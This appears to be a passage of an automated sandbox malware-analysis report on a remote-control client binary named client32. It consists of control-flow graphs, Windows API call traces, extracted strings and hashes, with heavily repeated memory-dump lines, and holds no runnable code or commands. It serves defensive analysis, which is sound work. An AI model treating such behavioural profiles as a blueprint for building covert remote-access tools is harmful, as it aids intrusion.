                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                    • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                                                                                    • API String ID: 514040917-357498123
                                                                                                                                                                                                    • Opcode ID: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
                                                                                                                                                                                                    • Instruction ID: 3ecfaec1c78aa64732578d28134276498dc59d4967fe96fbd16849b56c65f872
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E12E33ED052A78BDB55CF24CC807D8B7F4AB1A308F4440EAE99597205EB719786CB92

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 2167 11085840-1108585d call 11085830 2170 1108585f-1108586f call 1115e4d1 2167->2170 2171 11085870-11085880 call 11141240 2167->2171 2176 11085882-1108588a 2171->2176 2176->2176 2177 1108588c-11085892 2176->2177 2178 11085893-11085899 2177->2178 2178->2178 2179 1108589b-110858d2 LoadLibraryA 2178->2179 2180 11085939-1108594e GetProcAddress 2179->2180 2181 110858d4-110858db 2179->2181 2184 110859dc-110859ed call 1115e4d1 2180->2184 2185 11085954-11085963 GetProcAddress 2180->2185 2182 110858dd-1108592e GetModuleFileNameA call 11080be0 LoadLibraryA 2181->2182 2183 11085930-11085933 2181->2183 2182->2183 2183->2180 2183->2184 2185->2184 2188 11085965-11085974 GetProcAddress 2185->2188 2188->2184 2189 11085976-11085985 GetProcAddress 2188->2189 2189->2184 2192 11085987-11085996 GetProcAddress 2189->2192 2192->2184 2193 11085998-110859a7 GetProcAddress 2192->2193 2193->2184 2194 110859a9-110859b8 GetProcAddress 2193->2194 2194->2184 2195 110859ba-110859c9 GetProcAddress 2194->2195 2195->2184 2196 110859cb-110859da GetProcAddress 2195->2196 2196->2184 2197 110859ee-11085a03 call 1115e4d1 2196->2197
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 1108592C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                                                                                                    • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                                                                                                    • API String ID: 2201880244-3035937465
                                                                                                                                                                                                    • Opcode ID: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
                                                                                                                                                                                                    • Instruction ID: e9fa9a36c663d757a0c8add56282bddb088a97f97ce07886abf3270b6b50a9db
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C051DE70E0431AAFD710DF79C880AAAFBF8AF49304B2185AAE8D5C7244EB71E441CF51

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 2200 689c6ba0-689c6c14 call 689d4710 call 689b5e90 GetTickCount call 689c9210 2207 689c6fb9-689c6fc9 call 689d28e1 2200->2207 2208 689c6c1a-689c6c1c 2200->2208 2210 689c6c26-689c6c33 GetTickCount 2208->2210 2212 689c6c35-689c6c3d call 689c6940 2210->2212 2213 689c6c42-689c6c49 2210->2213 2212->2213 2215 689c6c4b call 689b97c0 2213->2215 2216 689c6c50-689c6c57 2213->2216 2215->2216 2218 689c6c59-689c6c61 Sleep 2216->2218 2219 689c6c66-689c6c6d 2216->2219 2220 689c6f97-689c6f9e 2218->2220 2221 689c6c6f-689c6c7c WaitForSingleObject 2219->2221 2222 689c6c82-689c6cc2 call 689d3c10 select 2219->2222 2224 689c6fa4-689c6fb6 call 689d28e1 2220->2224 2225 689c6c20 2220->2225 2221->2222 2222->2224 2228 689c6cc8-689c6ccb 2222->2228 2225->2210 2230 689c6ccd-689c6cdf Sleep 2228->2230 2231 689c6ce4-689c6ce6 2228->2231 2230->2220 2231->2210 2232 689c6cec-689c6cf9 GetTickCount 2231->2232 2233 689c6d00-689c6d1c 2232->2233 2234 689c6f89-689c6f91 2233->2234 2235 689c6d22 2233->2235 2234->2220 2234->2233 2236 689c6d28-689c6d2b 2235->2236 2237 689c6d3d-689c6d45 2236->2237 2238 689c6d2d-689c6d36 2236->2238 2237->2234 2240 689c6d4b-689c6d95 call 689d3753 call 689b5c90 2237->2240 2238->2236 2239 689c6d38 2238->2239 2239->2234 2245 689c6f4f-689c6f7c GetTickCount InterlockedExchange call 689c77e0 2240->2245 2246 689c6d9b 2240->2246 2245->2220 2252 689c6f7e-689c6f83 2245->2252 2247 689c6dac-689c6ded call 689b9310 2246->2247 2253 689c6f3a-689c6f46 call 689b30a0 2247->2253 2254 689c6df3-689c6e58 GetTickCount InterlockedExchange call 689d3753 call 689d3c10 2247->2254 2252->2234 2259 689c6f47-689c6f4c call 689ba4e0 2253->2259 2264 689c6e5a-689c6e5b 2254->2264 2265 689c6e8b-689c6e99 call 689c28d0 2254->2265 2259->2245 2267 689c6e5d-689c6e74 call 689b6f50 2264->2267 2268 689c6e76-689c6e89 call 689b94e0 2264->2268 2270 689c6e9e-689c6ea4 2265->2270 2273 689c6ea7-689c6ebd call 689c77e0 2267->2273 2268->2270 2270->2273 2277 689c6ebf-689c6f1d InterlockedDecrement SetEvent call 689d31a0 call 689b5c90 2273->2277 2278 689c6f25-689c6f38 call 689b30a0 2273->2278 2285 689c6da0-689c6da6 2277->2285 2286 689c6f23 2277->2286 2278->2259 2285->2247 2286->2245
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6BD5
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6C26
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 689C6C5B
                                                                                                                                                                                                      • Part of subcall function 689C6940: GetTickCount.KERNEL32 ref: 689C6950
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002F4,?), ref: 689C6C7C
                                                                                                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 689C6CB4
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 689C6CD9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6CEC
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6DF3
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(02ED2D42,00000000), ref: 689C6E01
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(02ED2CEA), ref: 689C6EC3
                                                                                                                                                                                                    • SetEvent.KERNEL32(000002F8), ref: 689C6ECF
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6F4F
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(02ED2C8A,-689FA188), ref: 689C6F60
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ReadMessage returned FALSE. Terminating connection, xrefs: 689C6F3A
                                                                                                                                                                                                    • ProcessMessage returned FALSE. Terminating connection, xrefs: 689C6F25
                                                                                                                                                                                                    • FALSE, xrefs: 689C6E67
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 689C6E62
                                                                                                                                                                                                    • httprecv, xrefs: 689C6BDD
                                                                                                                                                                                                    • ResumeTimeout, xrefs: 689C6BBA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$Interlocked$ExchangeSleep$DecrementEventObjectSingleWaitselect
                                                                                                                                                                                                    • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                                                                                                    • API String ID: 4030855142-919941520
                                                                                                                                                                                                    • Opcode ID: 6bee2800ab5d1e735723a7550059e810aa4b75e525b566bf6c2f69eed7f84f93
                                                                                                                                                                                                    • Instruction ID: 795cb5795ccb58dc8cdb98df2fd610e4847b891a016a871fa154535a4986d902
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bee2800ab5d1e735723a7550059e810aa4b75e525b566bf6c2f69eed7f84f93
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58B1B0B5D042549FDB25CF64DD44BEE73B8EB49308F80409AE649A7240E7B5DAC4CF92

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11105EDB
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,771CC310,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11105EEF
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26
                                                                                                                                                                                                      • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                                                                                      • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWaitwsprintf
                                                                                                                                                                                                    • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                                                                                                                    • API String ID: 1112464733-403456261
                                                                                                                                                                                                    • Opcode ID: 5635cacc2ea566ca3e71dd3805252e4bc2cfcb6a1aaacb447e2f795ad6309a42
                                                                                                                                                                                                    • Instruction ID: 98d48469d2e7b61091a73167657919c28ab3cbb48a1ba220805b109c32019478
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5635cacc2ea566ca3e71dd3805252e4bc2cfcb6a1aaacb447e2f795ad6309a42
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6981B1B1E007569FDB51CFB48C89BAAFBE5BB08308F10857DE569D7280D7706A40CB12
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,000006CF,00000007,00000000), ref: 1113623F
                                                                                                                                                                                                    • SetWindowTextA.USER32(0001048A,00000000), ref: 111362E7
                                                                                                                                                                                                    • IsWindowVisible.USER32(0001048A), ref: 111363AC
                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
                                                                                                                                                                                                    • IsWindowVisible.USER32(0001048A), ref: 111363DA
                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11136408
                                                                                                                                                                                                    • EnableWindow.USER32(0001048A,00000001), ref: 11136417
                                                                                                                                                                                                    • IsWindowVisible.USER32(0001048A), ref: 11136468
                                                                                                                                                                                                    • IsWindowVisible.USER32(0001048A), ref: 11136475
                                                                                                                                                                                                    • EnableWindow.USER32(0001048A,00000000), ref: 11136489
                                                                                                                                                                                                    • EnableWindow.USER32(0001048A,00000000), ref: 111363EF
                                                                                                                                                                                                      • Part of subcall function 1112E330: ShowWindow.USER32(0001048A,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354
                                                                                                                                                                                                    • EnableWindow.USER32(0001048A,00000001), ref: 1113649D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion
                                                                                                                                                                                                    • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                                                                                    • API String ID: 4109833150-3803836183
                                                                                                                                                                                                    • Opcode ID: 212825261dc7ad45365317bf66098bda66adb5082d998191289fd6b69446b11f
                                                                                                                                                                                                    • Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 212825261dc7ad45365317bf66098bda66adb5082d998191289fd6b69446b11f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000000C), ref: 11073B95
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000024), ref: 11073B9B
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000003C), ref: 11073BA1
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000DB1C), ref: 11073BAA
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000054), ref: 11073BB0
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000006C), ref: 11073BB6
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,00000001,00000000), ref: 11073C7F
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00004000,Function_0006FD70,00000000,00000000,?), ref: 11073D1C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000001,00000000), ref: 11073D23
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
